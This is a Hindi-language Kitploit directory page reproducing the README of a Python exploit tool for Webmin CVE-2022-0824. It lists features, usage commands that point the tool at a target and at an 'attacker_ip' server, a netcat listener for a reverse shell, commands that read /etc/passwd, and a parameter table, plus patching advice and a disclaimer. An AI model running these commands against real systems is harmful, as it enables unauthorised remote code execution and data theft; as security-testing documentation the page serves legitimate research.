Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Webmin-CVE-2022-0824-Enhanced-Exploit — Webmin CVE-2022-0824 के लिए Python एक्सप्लॉइट जिसमें दो-मोड समर्थन है: सीधे कमांड निष्पादन और रिवर्स शेल। इसमें कई पेलोड प्रकार, बुद्धिमान फ़ाइल प्रबंधन, और अधिकृत सुरक्षा परीक्षण के लिए विस्तृत डीबग लॉगिंग शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलशेलकोड जनरेशन

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Webmin CVE-2022-0824 के लिए Python एक्सप्लॉइट जिसमें दो-मोड समर्थन है: सीधे कमांड निष्पादन और रिवर्स शेल। इसमें कई पेलोड प्रकार, बुद्धिमान फ़ाइल प्रबंधन, और अधिकृत सुरक्षा परीक्षण के लिए विस्तृत डीबग लॉगिंग शामिल हैं।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Webmin CVE-2022-0824 उन्नत शोषण उपकरण - कमांड निष्पादन और रिवर्स शेल दोहरे मोड का समर्थन करता है

Python Version License CVE

[!IMPORTANT]

Webmin CVE-2022-0824 भेद्यता के लिए एक उन्नत शोषण उपकरण, जो सीधे कमांड निष्पादन और रिवर्स शेल दो मोड का समर्थन करता है।

🚀 विशेषताएँ

  • ✅ दोहरे मोड समर्थन: कमांड निष्पादन मोड + रिवर्स शेल मोड
  • ✅ एकाधिक पेलोड: Perl, Bash, Python तीन अलग-अलग पेलोड
  • ✅ बुद्धिमान फ़ाइल प्रबंधन: स्वचालित रूप से अद्वितीय फ़ाइल नाम उत्पन्न करता है, फ़ाइल विरोध से बचाता है
  • ✅ अनिवार्य ओवरराइट अपलोड: मौजूदा फ़ाइलों के ओवरराइट को स्वचालित रूप से संभालता है
  • ✅ एकाधिक अपलोड विधियाँ: HTTP डाउनलोड, सीधे अपलोड, कमांड निष्पादन द्वारा निर्माण
  • ✅ विस्तृत डीबग जानकारी: पूर्ण निष्पादन प्रक्रिया लॉग
  • ✅ उपयोगकर्ता-अनुकूल इंटरफ़ेस: रंगीन आउटपुट और स्पष्ट स्थिति संकेत

📋 भेद्यता जानकारी

  • CVE संख्या: CVE-2022-0824
  • प्रभावित संस्करण: Webmin < 1.990
  • भेद्यता प्रकार: मनमानी फ़ाइल अपलोड के कारण दूरस्थ कोड निष्पादन
  • CVSS स्कोर: 9.8 (गंभीर)

🛠️ स्थापना आवश्यकताएँ

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 उपयोग विधि

कमांड निष्पादन मोड (अनुशंसित)

root@kitploit:~
# बुनियादी कमांड निष्पादन
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# सिस्टम जानकारी देखें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# फ़ाइलें सूचीबद्ध करें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# संवेदनशील फ़ाइलें देखें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# नेटवर्क जानकारी
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

रिवर्स शेल मोड

root@kitploit:~
# 1. लिसनर प्रारंभ करें
nc -nlvp 9999

# 2. शोषण निष्पादित करें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 पैरामीटर स्पष्टीकरण

*नोट: रिवर्स शेल मोड में आवश्यक

🎯 उपयोग उदाहरण

उदाहरण 1: सिस्टम जानकारी संग्रह

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

उदाहरण 2: फ़ाइल सिस्टम अन्वेषण

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

उदाहरण 3: नेटवर्क कॉन्फ़िगरेशन देखना

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 कार्य सिद्धांत

  1. लॉगिन प्रमाणीकरण: प्रदान किए गए क्रेडेंशियल का उपयोग करके Webmin प्रबंधन इंटरफ़ेस में लॉगिन करें
  2. पेलोड निर्माण: मोड के अनुसार संबंधित CGI स्क्रिप्ट उत्पन्न करें
  3. फ़ाइल अपलोड: फ़ाइल प्रबंधक के HTTP डाउनलोड फ़ंक्शन के माध्यम से पेलोड अपलोड करें
  4. अनुमति सेटिंग: अपलोड की गई फ़ाइलों के लिए निष्पादन अनुमतियाँ सेट करें
  5. कमांड निष्पादन: अपलोड की गई CGI स्क्रिप्ट तक पहुँचें और कमांड निष्पादित करें या रिवर्स कनेक्शन स्थापित करें

🛡️ सुरक्षा सुझाव

  • Webmin को नवीनतम संस्करण (>= 1.990) में अपडेट करें
  • Webmin प्रबंधन इंटरफ़ेस तक नेटवर्क पहुँच प्रतिबंधित करें
  • मजबूत पासवर्ड और दो-कारक प्रमाणीकरण का उपयोग करें
  • सिस्टम लॉग का नियमित ऑडिट करें
  • वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें

⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।

  • 🚫 अनधिकृत सिस्टम पर उपयोग निषिद्ध
  • 🚫 दुर्भावनापूर्ण हमलों के लिए उपयोग निषिद्ध
  • 🚫 उपयोगकर्ता संबंधित कानूनी जिम्मेदारी वहन करेगा
  • ✅ केवल स्पष्ट रूप से अधिकृत वातावरण में उपयोग करें
  • ✅ सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए उपयोग करें

📚 तकनीकी विवरण

पेलोड प्रकार

  • Perl CGI: मुख्य पेलोड, सबसे अच्छी संगतता
  • Bash CGI: बैकअप पेलोड, Linux सिस्टम के लिए उपयुक्त
  • Python CGI: बैकअप पेलोड, सबसे समृद्ध कार्यक्षमता

अपलोड विधियाँ

  1. HTTP डाउनलोड: Webmin फ़ाइल प्रबंधक की दूरस्थ डाउनलोड सुविधा के माध्यम से
  2. सीधे अपलोड: फ़ाइल अपलोड इंटरफ़ेस के माध्यम से
  3. कमांड निर्माण: सिस्टम कमांड के माध्यम से फ़ाइल बनाना

फ़ाइल नामकरण रणनीति

  • कमांड सामग्री के MD5 हैश पर आधारित
  • टाइमस्टैम्प प्रत्यय
  • सुनिश्चित करें कि प्रत्येक निष्पादन में अलग-अलग फ़ाइल नाम का उपयोग किया जाए

🔄 अद्यतन लॉग

v5.0 (2025-08-05)

  • ✨ कमांड निष्पादन मोड जोड़ा गया
  • 🐛 फ़ाइल ओवरराइट समस्या ठीक की गई
  • 🔧 फ़ाइल नामकरण रणनीति में सुधार किया गया
  • 📈 त्रुटि हैंडलिंग बढ़ाई गई

v4.0 (मूल पर आधारित)

  • 🎯 faisalfs10x के मूल कोड पर आधारित
  • 🔧 CGI संगतता में सुधार किया गया
  • 📝 विस्तृत लॉग जोड़े गए

🤝 योगदान

Issue और Pull Request सबमिट करने का स्वागत है!

  1. इस प्रोजेक्ट को Fork करें
  2. एक फीचर ब्रांच बनाएं (git checkout -b feature/AmazingFeature)
  3. परिवर्तन कमिट करें (git commit -m 'Add some AmazingFeature')
  4. ब्रांच पर पुश करें (git push origin feature/AmazingFeature)
  5. Pull Request खोलें

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत है - विवरण के लिए LICENSE फ़ाइल देखें

🙏 आभार

  • मूल कोड लेखक: @faisalfs10x
  • मूल प्रोजेक्ट पता: Webmin-CVE-2022-0824-revshell
  • CVE खोजकर्ता: संबंधित सुरक्षा शोधकर्ता

📞 संपर्क

यदि कोई प्रश्न या सुझाव हो, तो कृपया निम्नलिखित माध्यमों से संपर्क करें:

  • 📧 GitHub Issue सबमिट करें
  • 🐛 सुरक्षा मुद्दों की रिपोर्ट करने के लिए कृपया निजी संदेश भेजें

⭐ यदि यह प्रोजेक्ट आपके लिए उपयोगी है, तो कृपया एक Star देकर समर्थन करें!

🔗 संबंधित लिंक

  • CVE-2022-0824 विवरण
  • Webmin आधिकारिक वेबसाइट
  • मूल प्रोजेक्ट

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
टूल डाउनलोड करें
पैरामीटरविवरणआवश्यकउदाहरण
-t, --targetलक्ष्य Webmin URL✅http://192.168.1.100:10000/
-c, --credentialलॉगिन क्रेडेंशियल✅admin:password
-LS, --py3http_serverHTTP सर्वर पता✅192.168.1.50:8080
--shellनिष्पादित करने के लिए कमांड❌"ls -la"
-L, --callback_ipरिवर्स शेल कॉलबैक IP❌*192.168.1.50
-P, --callback_portरिवर्स शेल कॉलबैक पोर्ट❌*9999